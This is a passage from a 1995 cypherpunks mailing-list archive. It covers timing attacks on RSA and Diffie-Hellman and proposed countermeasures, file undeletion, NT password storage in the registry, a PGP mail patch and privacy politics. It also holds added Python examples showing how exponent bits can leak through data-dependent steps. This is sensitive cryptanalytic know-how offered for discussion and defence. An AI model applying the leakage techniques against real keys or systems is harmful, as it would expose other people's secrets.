not 8.  Second, it cannot be easily changed.  Sure, your code probably
has a #define for the keysize, but that is just to describe the magic
number, not to make it easy to change it. Increasing the keylength of
IDEA, without changing anything else, will probably _NOT_ make it more
secure.

> Last thing -- how secure is unix "rm"?  If something is rm'd, is it 
> really really gone? 

Well, it depends on what you mean by "really really gone".  All RM
does is remove the link from the directory entry to the file inode on
disk.  If the inode refcount reaches zero, then the disk blocks are
marked as free.  However the data in those blocks remain on disk until
another file writes over them.

It is theoretically possible to write a program to "unrm" a file.

-derek
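
The link-count behaviour described above, as an added Python example (not code from the thread): it shows that unlinking a name only drops a directory entry, and that the contents stay reachable through a second hard link or an open descriptor. File names and contents are constructed; it does not show recovery of freed blocks, which needs raw access to the disk.

```python
# Added illustration: what rm's unlink() does to names and the inode link count.
import os
import tempfile

SECRET = b"constructed sample secret\n"   # constructed sample contents


def unlink_demo(secret=SECRET):
    """Return observations showing unlink() removes a name, not the data."""
    obs = {}
    with tempfile.TemporaryDirectory() as d:
        a = os.path.join(d, "a.txt")
        b = os.path.join(d, "b.txt")
        with open(a, "wb") as f:
            f.write(secret)

        os.link(a, b)                      # second directory entry, same inode
        obs["nlink_two_names"] = os.stat(a).st_nlink

        os.unlink(a)                       # the system call rm makes
        obs["nlink_after_rm_a"] = os.stat(b).st_nlink
        with open(b, "rb") as f:
            obs["read_via_b"] = f.read()   # data intact under the other name

        fd = os.open(b, os.O_RDONLY)       # hold a reference to the inode
        try:
            os.unlink(b)                   # last name removed
            obs["names_left"] = os.listdir(d)
            obs["nlink_open_fd"] = os.fstat(fd).st_nlink
            obs["read_via_fd"] = os.read(fd, len(secret))
        finally:
            os.close(fd)                   # only now can the blocks be freed
    return obs


if __name__ == "__main__":
    for key, value in unlink_demo().items():
        print(f"{key}: {value!r}")
```

Even after the last reference is closed, the file system only marks the blocks free; nothing in this sequence overwrites them.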





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tod McQuillin <devin@lm.com>
Date: Wed, 13 Dec 1995 15:00:54 +0800
To: cypherpunks@toad.com
Subject: PGP/PINE integration
Message-ID: <Pine.VUL.3.91.951212215232.25435I-100000@throop.foxholly.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I've modified PINE 3.91 to support PGP encryption from within its message 
editor.  I did the same thing for pine 3.89 a year and a half ago; I
finally got around to updating my changes for 3.91.

It's relatively seamless but provides no convenient means of decryption
from within PINE. 

diffs available from:

	ftp://ftp.foxholly.com/pub/pine-pgp-patch
- -- 
Tod McQuillin

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMM5Rs3hYKXs9uIwxAQHDlAP/Rku0lbeaVPfTwZsfFxjbov0KZ5PAcLkJ
emrE9vpr0pMSESuy0jIp7VRMHSUGA0Q0y7VFhinDxbsLT4FdVsCk5uxwieerzT/g
pnI7N8yNzVgM1IDXGL9lzGMyidULRoSnfSePT9AAjJxaIHOOK8+rw2bT4Cv1vDPw
JZFOFxhqW/U=
=osQC
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Wed, 13 Dec 1995 13:49:58 +0800
To: hfinney@shell.portal.com (Hal)
Subject: Re: Time-based cryptanalysis: How to defeat it?
In-Reply-To: <199512130144.RAA08950@jobe.shell.portal.com>
Message-ID: <9512130320.AA22567@all.net>
MIME-Version: 1.0
Content-Type: text


> From: futplex@pseudonym.com (Futplex)
> > I don't understand why Kocher's point is correct. For example, why do the
> > times diverge with the following modification of the modexp algorithm on
> > pg.2 of the abstract ?
> > 
> > 	Algorithm to compute R = y^x mod n:
> > 		Let R_0 = 1.
> > 		Let y_0 = y.
> > 		For i = 0 upto (bits_in_x - 1):
> > 			Let M = (R_i * y_i) mod n.
> > 			Let R_(i+1) = (bit i of x) * M  +
> > 					(1 - (bit i of x)) * R_i.
> > 			Let y_(i+1) = (y_i)^2 mod n.
> > 		End.
> 
> I posted a similar idea on sci.crypt, but later I realized that Paul Kocher
> is right.
> 
> Your algorithm works OK for the first iteration.  The amount of work is
> pretty much constant regardless of whether bit 0 of x is 0 or 1.
> However, at the end of that iteration R_1 will have one of two
> different values depending on that bit 0 value.  And, the attacker can
> know these two values, and if he controls y he can even choose them
> (they will be either y or 1).

I think that a lot of chosen plaintext attacks work regardless of timing
analysis.  For example, there is a well known chosen plaintext attack
against the RSA.  The deeper issue is that all of the efficient
algorithms for modular exponentiation take more time for 1s than for 0s. 
So the way to get security is to sacrifice efficiency (a widely known
but rarely proven reality).

-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236
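
The always-multiply loop quoted above, written out as an added example (not code from this thread or from Kocher's abstract). It assumes Montgomery multiplication as the modular multiplier, which the thread does not specify, and uses constructed 64-bit values. For two exponents that differ only in bit 0, the multiplication count is identical, iteration 0 behaves identically, and the record of the multiplier's data-dependent final subtraction diverges afterwards.

```python
# Added illustration. Assumptions: Montgomery multiplier, constructed inputs.

class Montgomery:
    """Montgomery arithmetic modulo an odd n, with R = 2**k > n."""

    def __init__(self, n):
        if n < 3 or n % 2 == 0:
            raise ValueError("modulus must be odd and >= 3")
        self.n = n
        self.k = n.bit_length()
        self.mask = (1 << self.k) - 1
        # n' = -n^{-1} mod R (three-argument pow with -1 needs Python 3.8+)
        self.n_neg_inv = (-pow(n, -1, 1 << self.k)) & self.mask

    def redc(self, t):
        """Return (t * R^{-1} mod n, extra), extra = 1 if the final
        conditional subtraction was needed. That step is data dependent."""
        m = ((t & self.mask) * self.n_neg_inv) & self.mask
        u = (t + m * self.n) >> self.k
        if u >= self.n:
            return u - self.n, 1
        return u, 0

    def to_mont(self, a):
        return ((a % self.n) << self.k) % self.n

    def mul(self, a, b):
        return self.redc(a * b)


def always_multiply_modexp(y, x, n, nbits):
    """R = y**x mod n using the quoted loop: M is computed in every
    iteration and bit i of x only selects between M and R_i.
    Returns (result, multiplications performed, extra-subtraction trace
    of the R_i * y_i multiply, one entry per iteration)."""
    mont = Montgomery(n)
    r = mont.to_mont(1)          # R_0 = 1
    yi = mont.to_mont(y)         # y_0 = y
    mults = 0
    trace = []
    for i in range(nbits):
        bit = (x >> i) & 1
        m, extra = mont.mul(r, yi)        # M = (R_i * y_i) mod n, always
        trace.append(extra)
        r = bit * m + (1 - bit) * r       # R_(i+1)
        yi, _ = mont.mul(yi, yi)          # y_(i+1) = (y_i)^2 mod n
        mults += 2
    result, _ = mont.redc(r)              # leave Montgomery form
    return result, mults, trace


# Constructed demo values (not from the thread).
DEMO_N = 0xF123456789ABCDEF               # odd 64-bit modulus
DEMO_Y = 0x0123456789ABCDEF
DEMO_X_EVEN = 0xC3A59F170B6DE2A4          # bit 0 = 0
DEMO_X_ODD = DEMO_X_EVEN | 1              # same exponent with bit 0 = 1

if __name__ == "__main__":
    for x in (DEMO_X_EVEN, DEMO_X_ODD):
        res, mults, trace = always_multiply_modexp(DEMO_Y, x, DEMO_N, 64)
        print(f"x={x:#018x} ok={res == pow(DEMO_Y, x, DEMO_N)} "
              f"mults={mults} extra_subtractions={sum(trace)}")
        print("  trace:", "".join(map(str, trace)))
```
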




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 13 Dec 1995 14:25:09 +0800
To: Brian Davis <bdavis@thepoint.net>
Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <Pine.BSF.3.91.951212132638.29192C-100000@mercury.thepoint.net>
Message-ID: <Pine.SUN.3.91.951212230359.16170C-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 12 Dec 1995, Brian Davis wrote:

> On Tue, 12 Dec 1995, David E. Smith wrote:
> 
> > At 04:45 AM 12/12/95 -0500, Black Unicorn wrote:
> > 
> > >> | PS - I think Paul was a bit surprised when Jim Barksdale pulled
> > >> | out his wallet and handed him 10 crisp $100 bills.  :-)
> > >> Great.  mention it where the IRS is sure to be listening.  :)
> > >Why would the IRS listen?  Everyone knows the tax system is voluntary.
> > 
> > Do you know something I don't?  :)
> > Would you mind sharing?  :)

Apparently so.  It's called 'sarcasm'

> 
> Try misc.taxes for the tax protestor arguments (which fail of course).  
> But by asking, you may be on "their" list (and I don't mean a list held 
> by tax protestors but by a TLA).  And if you're reallllllly bad about it, 
> one of my buddies may decide to invite you in ...
> 
> EBD
> 
> 
> > 
> > Dave
> > ----- David E. Smith, c/o Southeast Missouri State University
> > 1210 Towers South, Cape Girardeau MO USA 63701-4745, +1(573)339-3814
> 

---
My preferred and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 13 Dec 1995 14:46:47 +0800
To: Ginger Warbis <Webmaster@fornits.com>
Subject: Re: Netscape announces position against GAK
In-Reply-To: <199512121939.OAA17633@www2.clever.net>
Message-ID: <Pine.SUN.3.91.951212230450.16170D-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 12 Dec 1995, Ginger Warbis wrote:

> >On Fri, 8 Dec 1995, James A. Donald wrote:
> >
> >> At 04:27 AM 12/9/95 -0800, Timothy C. May wrote:
> >> >Credit where credit is due.
> >> >
> >> >I for one am satisfied--and even pleased--with the Netscape position on GAK.
> >> 
> >> Well I for one, am seriously unsatisfied, but it is not so bad as
> >> to merit a campaign against Netscape.
> >
> >I think it's a good start.  I would like to see how much effort after 
> >this really pans out.  Doesn't take much to put out a policy statement.  
> >Takes a lot to follow it through.
> >
> 
> Greetings all. May I also point out that the power of self government is at
> least as effective when rewarding good behavior as when punishing bad. You
> guys are the experts in this particular political niche, but from the
> viewpoint of a more or less innocent stander-by, the statement sounded to me
> like "OK, we went, we listened, they were full of shit, the line is HERE."
> and I'm quite satisfied.

I haven't seen 'good behavior' worth much notice yet.  Like I said, it 
takes about 10 minutes to come up with a written policy.  Netscape may 
have done more than that, but who's to say?

I'll be impressed when I see a sustained record of activism on the issue.
Till then they are slimy corporate types.  Which, IMHO, is fine so long 
as they don't claim to be anything else.

> --
> Bill & or Ginger Warbis
> WebMaster@Fornits.com - http://fornits.com/
> "The more corrupt the state, the more numerous the laws."
> Tacitus, Roman senator and historian (A.D. c.56- c.115)
> 
> 

---
My preferred and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Wed, 13 Dec 1995 16:48:45 +0800
To: nsb+limbo@nsb.fv.com>
Subject: Re: Usability of Cryptography (was Re: More FUD from First Virtual)
Message-ID: <199512130722.XAA11947@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 01:06 PM 12/11/95 -0700, Bryce wrote:
> To get to the point, I want to know if this "fundamental 
> tradeoff" that you refer to is in fact *fundamental*.  That is
> to say: is the product of the "security factor" and the
> "usability factor" a constant?  Or are there methods which can
> be practically implemented to make strong cryptography easier
> for Joe Average to use without exposing Joe to unnecessary
> risks?

Web of trust is a mess because it attempts to link keys to 
physical people, which in general cannot be done.

If we stick to a lesser goal -- constancy of identity -- 
this is not so hard.  In general it is impossible to prove that 
Bryce is the "real" Bryce, but it is trivial to prove that 
Bryce is the same Bryce who has a certain Web page, and the
same Bryce who posted a certain article in archives.

We should blow off this attempt to do the impossible.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Wed, 13 Dec 1995 16:42:23 +0800
To: Black Unicorn <Webmaster@fornits.com>
Subject: Re: Netscape announces position against GAK
Message-ID: <199512130723.XAA11951@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 11:06 PM 12/12/95 -0500, Black Unicorn wrote:
> I haven't seen 'good behavior' worth much notice yet.  Like I said, it 
> takes about 10 minutes to come up with a written policy.  Netscape may 
> have done more than that, but who's to say?
>
> I'll be impressed when I see a sustained record of activism on the issue.
> Till then they are slimy corporate types.  Which, IMHO, is fine so long 
> as they don't claim to be anything else.

While I am unhappy about many aspects of their statement, notably
that they use the government's phrase "key escrow" all over the place,
the fact is they have placed news about what mischief the government
is up to, on a location that gets a totally stupendous number of hits.

This will notify a stupendous number of people what the government 
is up to.

It is less than they could have done, less than they should have done,
but it is still a very big something, and having done this, before
the entire internet and all their customers, it is at least somewhat
difficult for them to then turn around and shop their customers 
to the state.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal Abelson <hal@martigny.ai.mit.edu>
Date: Wed, 13 Dec 1995 14:10:10 +0800
To: cypherpunks@toad.com
Subject: Computers, Freedom, and Privacy Conference -- Registration Open
Message-ID: <9512130408.AA22004@toad.com>
MIME-Version: 1.0
Content-Type: text/plain




		      Please redistribute widely

	       ****************************************

The Sixth Conference on Computers, Freedom, and Privacy will take
place at the Massachusetts Institute of Technology on March 27-30,
1996.  CFP96 is hosted by MIT and by the World Wide Web Consortium.

You can register for CFP96 by US Mail, by fax, or via the World Wide
Web.

Conference attendance will be limited.  Due to the enormous public
interest in CFP issues over the past year, we encourage you to
register early.

SPECIAL NOTE TO STUDENTS: There are a limited number of places
available at a special student rate.  These will be allotted on a
first-come first-served basis, so register as soon as possible.

For more information, see the CFP96 Web page at

		       http://web.mit.edu/cfp96

or send a blank email message to 

			  cfp96-info@mit.edu

Since its inception in 1991, the series of CFP conferences has brought
together experts and advocates from the fields of computer science,
law, business, public policy, law enforcement, government, and many
other areas to explore how computer and telecommunications
technologies are affecting freedom and privacy.

Events planned for this year's conference include:

    - Federal prosecutors square off against civil-liberties lawyers
      in a mock Supreme Court test of the "Cryptography Control Act of
      1996", which criminalizes non-escrowed encryption.
      
    - Authors Pat Cadigan, Tom Maddox, Bruce Sterling,
      and Vernor Vinge divine the future of privacy.

    - College administrators, students, lawyers, and journalists
      role-play scenarios that plumb the limits of on-line expression
      on campus networks.

    - Panels on international issues in privacy and encryption; on the
      struggle to control controversial content on the Internet; on
      tensions between copyright of digital information and freedom of
      expression; on threats posed by electronic money to law
      enforcement, privacy, and freedom; on mass communication versus
      mass media.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ted Cabeen <cabeen@netcom.com>
Date: Wed, 13 Dec 1995 14:13:22 +0800
To: cypherpunks@toad.com
Subject: NT Password Security Update.  Registry values changed!
Message-ID: <2.2b7.32.19951213071131.00316644@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Well, I did some more research into the NT password security issue and I
discovered that I can get access to the Security section of the registry and
there are some VERY interesting values there, stored as raw hex.  I created
a test user and checked the values of these registry keys with two different
passwords and interestingly enough the data in the keys changed when I
changed the password.  I plan on doing some more work, including changing
the values and seeing if the password changes, but I've been somewhat busy
lately.  I've set up a web page at

http://shadowland.rh.uchicago.edu/ntcrypto.html 

that has the password I used and the data in the two registry values that
changed when I changed the password.  I invite people to look at it and
speculate what the change means.  Also, I can provide a few more
plaintext/cyphertext pairs if necessary.  The change in the values could be
something like update time, but I don't think that they'd store that as raw
hex, especially hex as long as the stuff I got.  Good luck figuring it out.
_____________________________________________________________________________
Ted Cabeen                                                  cabeen@netcom.com
Finger for PGP Public Key                        secabeen@midway.uchicago.edu
"I have taken all knowledge to be my province."            cococabeen@aol.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Thu, 14 Dec 1995 02:26:33 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <199512121306.IAA02006@jekyll.piermont.com>
Message-ID: <Pine.SUN.3.91.951212231006.5039C-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 12 Dec 1995, Perry E. Metzger wrote:
> 
> Go ahead and trust that no one can do it, then. Considering that NTP
> can synch up clocks over the net with astonishing accuracy with
> multiple probes, it would be hard to believe that you couldn't

Perry - I don't think NTP goes down to the sort of resolution that 
appeared to be where the signal is here, and for quantisation reasons, I 
don't think it can work over a public routed internetwork. I'm still open 
to having my mind changed here; my network weenie gut instincts tell me 
that routing is too non-random for the signal to propagate.

[I may have misread the paper, but the accuracy required seemed to be on 
the order of 10-100 usecs; if I've got that wrong, could someone mail me 
an OOM to be working with]

Simon





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 15 Dec 1995 00:21:58 +0800
To: lyalc@mail.mpx.com.au (lyal collins)
Subject: Re: Timing RSA and Certificates worth ??
Message-ID: <199512130721.XAA21701@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:50 PM 12/13/95 +1100, lyalc@mail.mpx.com.au (lyal collins) wrote:
>I meant that on-line certificate issuing, notary and similar services where
>data is submitted to a system for processing/RSA encryption are subject to
>this form of attack.
>Parts of the SEPP/STT protocols appear to require this of merchants and
>customers.
>I retract my comments about ecash/echeques - I'm not sure of the
>implications there yet.
>As for SEPP/STT - another nail in the coffin, me thinks.

For large environments like this, it's possible to work around the attack
by methods like queueing up all the signature jobs and doing them
serially; this makes it difficult for the Bad Guy to know whether the server 
is taking time doing his multiplications or Alice's or N other customers',
so he can't control timing very well by picking otherwise-informative numbers.

On the other hand, your smartcard or PC is still at risk, since it's _not_
doing a lot of them, unless it's doing them just sort of at random when
it's got nothing better to do and throws the real work in the middle.
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 15 Dec 1995 07:50:56 +0800
To: cypherpunks@toad.com
Subject: Potential defense against timing attack on Diffie-Hellman
Message-ID: <199512130721.XAA21709@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


The timing attack on Diffie-Hellman depends on assumptions
about what multiplications are being made, and in what order.
But you don't need to do them in order.

The standard approach to calculating Y**x mod m is to calculate
        Y[1] = Y, Y[2] = Y**2, Y[3] = Y**4, .... Y[logx] = Y**(logx), 
and while you're doing this keep a running total r[i], where 
        r[i] = (bit[x,i]) ? (r[i-1]*Y[i]) : r[i-1]
all arithmetic modulo m (and all indices possibly off by one :-)

This may be a bit memory-intensive for a smartcard, but there's
no need to calculate these partial products in order; precompute
the Y[i], pick a random permutation of 1..(logx), and compute
the partial products in that order.  This still leaks the number
of 0 and 1 bits in x, but it doesn't say what they are.
You probably still should multiply r[i-1]*Y[i] whether you're 
going to need it or not; I don't think the method hides enough
information otherwise, but that needs more analysis.

Cost - mostly administrative, plus the memory, since keeping track
of permutations of small integers is cheap relative to bignum 
multiplication and modulo calculations.  You also need a random 
number generator of some sort; LFSRs seem to be an easy way to 
do permutations on the fly, so seed them with something decent.

How effective is it?  I'm not sure - I'd need to do a lot more analysis
than I've done so far, and the long version of Paul's paper would
help :-)  But at first glance it looks like it makes it much harder;
no two calculations are in the same order, so feeding the system
related Y = g**y mod m each time doesn't tell you much.

As a further annoyance to the listener, split the permutation
at random into two or three pieces, compute their products separately,
and then multiply those partial products together.  (Don't try this at
home without analyzing whether it may leak more information than it
conceals...)  At very minimum, take two numbers you've got lying
around and multiply them every once in a while :-)

#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@darkwing.uoregon.edu>
Date: Wed, 13 Dec 1995 16:47:02 +0800
To: cypherpunks@toad.com
Subject: e-mail forwarding, for-pay remailers
Message-ID: <199512130721.AA23573@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text/plain



I don't have much faith that the people who are currently doing the DNS
for my domain name (goldenbear.com) are going to do anything about the
current bouncing-messages phenomenon anytime soon, so I'm looking into other
ways to get & send E-mail (e.g., more persistent than this address which
will disappear when I'm done with school in ~ 6 months). I've found a few
services which may be of interest to C-punks because they're useful for
creating/maintaining persistent cyberspace identities with no necessary
connection to a "real name".

I'm not listing the alpha-style alias servers because they depend on
underlying remailers which I think makes them likely to be slower & less
reliable; also, they won't store E-mail for you, such that you could connect
every day or two or [...] to pick it up.

I'm also ignoring the zillions of ISP's because I think that the market is
separating (or ought to) into service/storage providers and connectivity
providers. My hunch is that in the next year or so it's going to become easy
to get nationwide dialups for IP connectivity the way it was done for X.25
10 years ago, so you won't care *where* you are, you'll be able to get an IP
connection back to the folks that hold your mail, and you won't give a shit
where *they* are. Then again, if the Exon stuff passes, I suspect that all
we'll be left with in the US are service providers who deal with us at the
level of IP packets and get (quasi-)common carrier status, acting just like
Sprintnet/Tymnet/Telenet/CPN, but with IP not X.25. We'll all connect to
offshore providers to pick up our E-mail and read our newsgroups, the
control freaks will hate it, and we won't care.

netbox.com ( http://www.netbox.com ) provides web pages and E-mail storage
or forwarding for people; they let you sign up for a trial month for free.
They ask for name/address/phone (which could easily be a Mailboxes Etc
address and a voicemail from Mailboxes Etc or whatever) and accept payment
by check or credit card. They'll store incoming email or forward it to
another account. They'll do header rewriting (similar to the anonymous
remailers) so that outgoing mail looks like it came from this address.

thebook.com ( http://www.thebook.com ) provides web pages and E-mail storage
or forwarding or E-mail -> FAX conversion, and also let you sign up for a
free month to try things out. They also ask for name/address/phone. You can
send incoming Emails to different places depending on wildcard-based filter
criteria.

The ACM ( http://www.acm.org ) provides e-mail forwarding and web pages to
ACM members ($25 for students or ~$80 for professionals) for ~ $25/year.

Hiway Technologies ( http://www.hway.com ) provides web pages and will
accept/forward mail sent to your own domain name for pretty cheap.

I'm planning to make a wee FAQ on this for my home page, please send along
comments re these folks or suggestions about others.
--
"The anchored mind screwed into me by the psycho-    Greg Broiles
lubricious thrust of heaven is the one that thinks   
every temptation, every desire, every inhibition."   greg@goldenbear.com
	-- Antonin Artaud		   gbroiles@darkwing.uoregon.edu





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ljanke@direct.ca
Date: Fri, 15 Dec 1995 00:19:12 +0800
To: cypherpunks@toad.com
Subject: Authenication and CIRC
Message-ID: <199512130722.XAA00259@clouds.heaven.org>
MIME-Version: 1.0
Content-Type: text/plain



Does anyone know of versions of CIRC which support authentication?
The version I pulled off csua does not even for the initial 3DES
key exchange.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Wed, 13 Dec 1995 15:17:27 +0800
To: "Rev. Ben" <samman-ben@CS.YALE.EDU>
Subject: Re: EXON [Noise]
In-Reply-To: <Pine.A32.3.91.951212150845.27478H-100000@FROG.ZOO2.CS.YALE.EDU>
Message-ID: <Pine.SUN.3.91.951212232721.5039F-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain



Exon 		<clap, clap>
Exoff 		<clap, clap>
Exon, Exoff
The Censor 	<clap, clap> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 13 Dec 1995 16:29:47 +0800
To: cypherpunks@toad.com
Subject: Re: Potential defense against timing attack on Diffie-Hellman
Message-ID: <199512130743.XAA25025@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Follow-on defense for low-memory smartcards:  This is a bit ugly
and I'm not sure how much it protects your information, but it's some
help for systems that can't store 1024 partial products 1024 bits long,
which smartcards generally can't be expected to do :-)

Pick k random values K1, K2, .. Kk, where k is some medium-sized number; 
probably about 10 though maybe more would be better.
Calculate Y[i] = Y**2**i, i=1...log x, as before, but instead of calculating
        r[i] = r[i-1] or r[i-1]*Y[i], i=1...logx,
calculate separate subproducts for i={1...K1}, {K1+1...K2}, ... {Kk...logx},
and then multiply those subproducts together.  The easy way to do this is to
keep a second running product P, and whenever you reach Kj, set P = P*r[i],
and set r[i]=1 for the next round of (Kj)+1...K(j+1).  You still need to
calculate r[i-1]*Y[i] whether you're using it or not.

For added obnoxiousness, at the cost of about 50% more calculation, you could
calculate Yinv = Y**-1 mod m, and calculate r[i] and Y**i for i = 1...Kj, 
calculate through Y[logx] ignoring the r[]s, and then calculate r[i]
and Y[logx] * Yinv**[logx-i] for i=logx....Kj+1.
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281
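
The two schemes Bill Stewart describes, in this message and in his earlier "Potential defense against timing attack on Diffie-Hellman" message, sketched as an added example (not code from the thread). Assumptions: indices are 0-based, the permutation and cut points come from Python's random.SystemRandom rather than the LFSR the message suggests, and the modulus, base and exponent are constructed. Python big-integer arithmetic is not constant-time, so this shows the structure and checks the arithmetic, and makes no claim about how much timing information remains.

```python
import random

# Constructed demo values (not from the thread).
DEMO_M = 2**127 - 1
DEMO_Y = 0x1234567890ABCDEF1234567890ABCDEF
DEMO_X = 0x0F1E2D3C4B5A69788796A5B4C3D2E1F0
DEMO_BITS = 128


def power_table(y, m, nbits):
    """Precompute Y[i] = y**(2**i) mod m for i = 0..nbits-1."""
    table, cur = [], y % m
    for _ in range(nbits):
        table.append(cur)
        cur = (cur * cur) % m
    return table


def permuted_modexp(y, x, m, nbits, rng=None):
    """First message: precompute the Y[i], then fold them into the running
    product in a fresh random order, multiplying in every step whether or
    not bit i of x is set. Returns (result, multiplications, order used)."""
    rng = rng or random.SystemRandom()
    table = power_table(y, m, nbits)
    order = list(range(nbits))
    rng.shuffle(order)
    r, mults = 1, 0
    for i in order:
        bit = (x >> i) & 1
        prod = (r * table[i]) % m         # computed even when bit == 0
        mults += 1
        r = bit * prod + (1 - bit) * r    # keep prod only if the bit is set
    return r % m, mults, order


def segmented_modexp(y, x, m, nbits, k, rng=None):
    """Follow-on for low memory: no table. Walk the bits in order, but at
    k random cut points fold the running product r into a second product
    P and restart r at 1. Returns (result, multiplications, cut points)."""
    rng = rng or random.SystemRandom()
    if not 0 <= k < nbits:
        raise ValueError("k must satisfy 0 <= k < nbits")
    cuts = set(rng.sample(range(1, nbits), k))
    total, r, cur, mults = 1, 1, y % m, 0
    for i in range(nbits):
        if i in cuts:
            total = (total * r) % m       # P = P * r
            r = 1
            mults += 1
        bit = (x >> i) & 1
        prod = (r * cur) % m              # computed whether used or not
        r = bit * prod + (1 - bit) * r
        cur = (cur * cur) % m             # next Y[i], computed on the fly
        mults += 2
    return (total * r) % m, mults, sorted(cuts)


if __name__ == "__main__":
    expected = pow(DEMO_Y, DEMO_X, DEMO_M)
    for _ in range(2):
        res, mults, order = permuted_modexp(DEMO_Y, DEMO_X, DEMO_M, DEMO_BITS)
        print("permuted ok:", res == expected, "mults:", mults,
              "first indices:", order[:6])
    res, mults, cuts = segmented_modexp(DEMO_Y, DEMO_X, DEMO_M, DEMO_BITS, 10)
    print("segmented ok:", res == expected, "mults:", mults, "cuts:", cuts)
```
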





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp (ecarp@netcom.com)" <ecarp@netcom.com>
Date: Wed, 13 Dec 1995 16:39:24 +0800
To: Matthias Schunter <WWW-BUYINFO@allegra.att.com
Subject: Re: e-Cash: CAFE vs. Mondex
Message-ID: <199512130705.BAA22782@khijol>
MIME-Version: 1.0
Content-Type: text/plain


> Date:          Tue, 12 Dec 1995 11:34:58 +0100
> To:            David Klur <dklur@dttus.com>
> From:          Matthias Schunter <schunter@informatik.uni-hildesheim.de>
> Subject:       Re: e-Cash: CAFE vs. Mondex
> Cc:            pfitzb@informatik.uni-hildesheim.de, WMI@ZURICH.IBM.COM,
>                cypherpunks@toad.com, WWW-BUYINFO@allegra.att.com

> Dear Mr. Klur,
> 
> 
> I'm a member of the CAFE consortium but I can not answer your question.
> As far as we know, the details of the Mondex protocols are still 
> confidential (or only available under a non-disclosure license). 

Oh, I see.  Is this another one of those "we won't let you make sure 
that your money is safe with us, you'll just have to trust us" sort 
of things?

Security through obscurity was never a very strong selling suit, 
especially to those who know that STO very likely hides a very weak 
encryption/authentication scheme.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Wed, 13 Dec 1995 15:17:37 +0800
To: cypherpunks@toad.com
Subject: The Elevator Problem (a.k.a. build a private key in public)
Message-ID: <9512130511.AA25229@all.net>
MIME-Version: 1.0
Content-Type: text


Alice: tell Bob your public key
Bob: use Alice's public key to encrypt a random number and tell it to everyone

Now: start communicating using the random number as a private key.

-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
